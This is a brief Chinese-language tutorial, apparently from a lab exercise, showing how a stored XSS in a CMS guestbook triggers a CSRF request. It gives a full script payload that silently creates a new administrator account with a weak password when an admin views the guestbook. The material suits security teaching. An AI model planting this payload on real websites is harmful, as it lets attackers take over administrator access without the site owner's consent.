CMS创建新用户

方法：攻击者可以利用 XSS 触发 CSRF 攻击。因为，可以利用 JS 发送 HTTP 请求。经过研究受害网站的业务流程，可以构造如下代码：

代码：

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://10.9.47.44/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=wj33333&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

前提：

我们发现CSM网站留言板存在xss漏洞

1.第一步：

• 填写留言板并提交。

2.第二步：

• 模仿管理员管理留言板。
• 管理员登录账号

• 查看留言板

到这里就已经完成了添加用户。

• 查看管理员账号，发现是我们添加的账号

• 登录